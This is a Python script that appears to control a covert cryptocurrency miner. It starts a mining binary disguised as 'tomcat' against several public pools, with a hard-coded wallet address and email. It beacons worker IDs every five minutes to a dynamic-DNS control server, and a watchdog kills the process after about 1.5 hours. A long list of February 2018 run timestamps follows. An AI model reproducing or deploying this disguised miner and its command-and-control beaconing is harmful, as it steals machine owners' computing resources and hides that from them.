import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:04.313366
#2018-02-17 17:39:05.243184
#2018-02-17 19:27:05.407662
#2018-02-17 21:16:07.934007
#2018-02-17 23:00:07.808618
#2018-02-18 00:46:06.494092
#2018-02-18 02:34:04.328484
#2018-02-18 04:20:08.559070
#2018-02-18 06:11:04.770834
#2018-02-18 08:00:01.643427
#2018-02-18 09:48:01.462487
#2018-02-18 11:35:06.841589
#2018-02-18 13:20:07.154020
#2018-02-18 15:10:05.737403
#2018-02-18 16:58:05.444437
#2018-02-18 18:45:08.221275
#2018-02-18 20:33:01.868455
#2018-02-18 22:19:04.969010
#2018-02-19 00:08:05.672573
#2018-02-19 01:54:01.586160
#2018-02-19 03:41:04.573040
#2018-02-19 05:26:05.579023
#2018-02-19 07:14:08.405925
#2018-02-19 09:04:02.207884
#2018-02-19 10:51:08.253110
#2018-02-19 12:39:01.370132
#2018-02-19 14:27:08.995136
#2018-02-19 16:16:08.795019
#2018-02-19 18:04:02.058303
#2018-02-19 19:51:08.085580
#2018-02-19 21:38:06.441213
#2018-02-19 23:24:01.793819
#2018-02-20 01:10:07.406116
#2018-02-20 02:59:06.999303
#2018-02-20 04:47:03.752557
#2018-02-20 06:31:04.391991
#2018-02-20 08:17:05.271946
#2018-02-20 10:04:03.838219
#2018-02-20 11:48:08.939031
#2018-02-20 13:36:06.206885
#2018-02-20 15:21:05.130031
#2018-02-20 17:07:02.216732
#2018-02-20 18:57:04.692046
#2018-02-20 20:46:04.785270
#2018-02-20 22:32:01.686456
#2018-02-21 00:13:06.232334
#2018-02-21 01:59:06.244122
#2018-02-21 03:48:01.392732
#2018-02-21 05:36:04.823554
#2018-02-21 07:23:05.936015
#2018-02-21 09:08:05.352794
#2018-02-21 10:57:02.128616
#2018-02-21 12:44:08.711188
#2018-02-21 14:32:08.154943
#2018-02-21 16:19:06.846776
#2018-02-21 18:09:07.718543
#2018-02-21 19:55:11.030636
#2018-02-21 21:42:01.305244
#2018-02-21 23:29:08.232843
#2018-02-22 01:18:05.162168
#2018-02-22 03:07:07.451226
#2018-02-22 04:52:05.206328
#2018-02-22 06:39:01.803894
#2018-02-22 08:27:08.001127
#2018-02-22 10:15:09.567420
#2018-02-22 12:01:10.666536
#2018-02-22 13:47:07.075879
#2018-02-22 15:35:08.817741
#2018-02-22 17:21:03.983961
#2018-02-22 19:09:07.600679
#2018-02-22 21:02:04.786875
#2018-02-22 22:48:01.814507
#2018-02-23 00:34:03.874541
#2018-02-23 02:20:06.578715
#2018-02-23 04:07:02.031631
#2018-02-23 05:54:05.447750
#2018-02-23 07:43:05.415491
#2018-02-23 09:47:07.890212
#2018-02-23 11:48:01.974637
#2018-02-23 13:39:09.568191
#2018-02-23 15:28:07.205783
#2018-02-23 17:18:05.051427
#2018-02-23 19:07:05.375445
#2018-02-23 20:52:06.381836
#2018-02-23 22:38:05.635480
#2018-02-24 00:24:06.877901
#2018-02-24 02:16:04.027100
#2018-02-24 04:07:07.306661
#2018-02-24 05:54:05.576164
#2018-02-24 07:41:07.574519
#2018-02-24 09:26:06.579204
#2018-02-24 11:20:01.749154
#2018-02-24 13:09:06.358770
#2018-02-24 14:59:01.717742
#2018-02-24 16:49:03.697518
#2018-02-24 18:37:04.825073
#2018-02-24 20:28:02.460304
#2018-02-24 22:24:04.136617
#2018-02-25 01:32:03.706423
#2018-02-25 05:25:07.548144
#2018-02-25 11:35:05.591757